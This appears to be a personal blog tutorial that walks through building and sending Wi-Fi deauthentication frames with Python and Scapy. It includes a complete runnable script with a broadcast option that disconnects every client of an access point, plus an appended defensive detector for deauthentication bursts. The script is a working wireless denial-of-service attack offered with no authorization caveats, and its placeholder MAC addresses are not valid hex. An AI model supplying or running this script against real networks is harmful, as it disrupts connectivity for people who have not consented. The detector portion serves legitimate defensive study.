How to Create and Send Wireless Deauthentication Packets Using Python and Scapy

Namaste Friends,



Today, in this post, I am going to show you how to create and send deauthentication packets using Python and the Scapy module.


Python Scapy Module Introduction


The Python Scapy module allows us to capture, encode and decode packets, and to perform sniffing, scanning and many other network-related tasks.

Friends, this is my third tutorial based on the Scapy module. So, if you are a new visitor, I suggest you take a look at my previous tutorials. Also


Now, let's start with some basic knowledge about what a deauthentication packet is and what role it plays in wireless connectivity.


Q 1. What is a deauthentication packet?

Ans. As Wikipedia says: """ The IEEE 802.11 (Wi-Fi) protocol contains the provision for a deauthentication frame. Sending the frame from the access point to a station is called a "sanctioned technique to inform a rogue station that they have been disconnected from the network".
An attacker can send a wireless access point a deauthentication frame at any time, with a spoofed address for the victim. The protocol does not require any encryption for this frame, even when the session was established with Wired Equivalent Privacy (WEP) for data privacy, and the attacker only needs to know the victim's MAC address, which is available in the clear through wireless network sniffing. """


Q 2. What is the role of deauthentication frames?

Ans. As the quote above describes, deauthentication frames with a spoofed address can be used to disrupt wireless connectivity between a client and its access point.

So now, let me quickly show you how to create deauthentication frames using the Python Scapy module. To keep the tutorial understandable, I wrote my Python code in a simple way, and for better explanation I am dividing it into small parts.


Code Part 1.




# Import Module
from scapy.all import *


This line imports the Scapy module.



Code Part 2.




# Access Point MAC Address
ap = "C5:JK:LL:UP:PO:8U"


This is the MAC address of the access point. This line is very important, so make sure you provide the correct MAC address of the access point.



Code Part 3.


# Client MAC Address
client = "FF:FF:FF:FF:FF:FF"  # Use this option only when you don't know the client address
#              OR
client = "UJ:JU:LO:LP:OU:TB"


Here, the client variable represents the client MAC address. If you don't know the correct MAC address of the client, or want to target all clients of the access point, you can use "FF:FF:FF:FF:FF:FF" instead of the client's real MAC address.



Code Part 4.



# Deauthentication Packet For Access Point
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()

# Deauthentication Packet For Client
# Use this option only if you have the client MAC address
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()



In this part, we create deauthentication packets for both the access point and the client. A complete deauthentication packet needs three layers: RadioTap, Dot11 and Dot11Deauth. As you can see in the code above, Scapy lets us stack these layers very easily with the statement "RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()". In this statement, RadioTap() is the first layer, which marks it as a wireless packet, Dot11() is the management layer of the packet, and Dot11Deauth() makes the packet a deauthentication frame.

Here, in the Dot11() function, we also need to pass a few required arguments:

addr1=client [Client MAC address]
addr2=ap     [Access point MAC address]
addr3=ap     [Access point MAC address]

And done! Our deauthentication packet for the access point is now ready.

You can also create the packet for the client MAC address using the same method with some small changes. Check the code above to make it clear.



Code Part 5.



# send Packets To Access Point 
sendp(pkt, iface="mon0")

# send Packet To Client
sendp(pkt1, iface="mon0")


Now we just need to send the deauthentication packets to their targets, and for this we will use sendp().

In this part, mon0 is our monitor-mode-enabled wireless interface. So, to run this code correctly, you first need to set your wireless card to monitor mode. If you don't know how to do it, check my other tutorial.


I think you've got it now.



Here is my complete code for creating and sending deauthentication packets.


# Import Module
from scapy.all import *


# Access Point MAC Address
ap = "C5:JK:LL:UP:PO:8U"

# Client MAC Address
client = "FF:FF:FF:FF:FF:FF"  # Use this option when you don't know the client address
#              OR
client = "UJ:JU:LO:LP:OU:TB"



# Deauthentication Packet For Access Point
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()

# Deauthentication Packet For Client
# Use this option only if you have the client MAC address
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()


# Send packets to access point
# The iface argument is the monitor-mode-enabled interface
sendp(pkt, iface="mon0")

# send Packet To Client
sendp(pkt1, iface="mon0")


Done!

Now, to run this code, just type the command below in a terminal.

sudo python path/to/script.py
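
The receiving side of the frames described above, as an added example that is not part of the original tutorial: a standard-library Python detector that parses raw radiotap/802.11 bytes, picks out deauthentication frames (management type 0, subtype 12), reads the same addr1/addr2/addr3 fields, and flags bursts from one transmitter to one receiver. The sample frames, MAC addresses, threshold and window are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
RADIOTAP = "0000080000000000"  # constructed minimal radiotap header (length 8)
# Constructed sample frames (locally administered MACs, not real devices)
DEAUTH = bytes.fromhex(RADIOTAP + "c0000000" + "020000000002"
                       + "020000000001" * 2 + "0000" + "0700")
BEACON = bytes.fromhex(RADIOTAP + "80000000" + "ff" * 6
                       + "020000000001" * 2 + "0000" + "00" * 12)

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(raw):
    """Return the fields of a radiotap-wrapped deauthentication frame, else None."""
    if len(raw) < 4:
        return None
    rt_len = struct.unpack_from("<H", raw, 2)[0]  # radiotap length, little endian
    dot11 = raw[rt_len:]
    if len(dot11) < 26:                           # 24-byte header + 2-byte reason
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, (dot11[0] >> 4) & 0xF
    if (ftype, subtype) != (0, 12):               # management / deauthentication
        return None
    return {"receiver": mac(dot11[4:10]),         # addr1
            "transmitter": mac(dot11[10:16]),     # addr2
            "bssid": mac(dot11[16:22]),           # addr3
            "reason": struct.unpack_from("<H", dot11, 24)[0]}

def detect_bursts(frames, threshold=5, window=1.0):
    """frames: iterable of (timestamp, raw bytes). One alert per address pair."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in frames:
        info = parse_deauth(raw)
        if info is None:
            continue
        key = (info["transmitter"], info["receiver"])
        times = recent[key]
        times.append(ts)
        while ts - times[0] > window:             # drop timestamps outside the window
            times.popleft()
        if len(times) >= threshold and key not in alerts:
            alerts[key] = {**info, "count": len(times),
                           "broadcast": info["receiver"] == BROADCAST}
    return list(alerts.values())

if __name__ == "__main__":
    capture = [(i * 0.1, DEAUTH) for i in range(6)] + [(0.25, BEACON)]
    for alert in detect_bursts(capture):
        print(alert)
```
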


So, this tutorial ends here.
In my next tutorial, I will explain more interesting Python code for wireless testing.

Written By
SSB
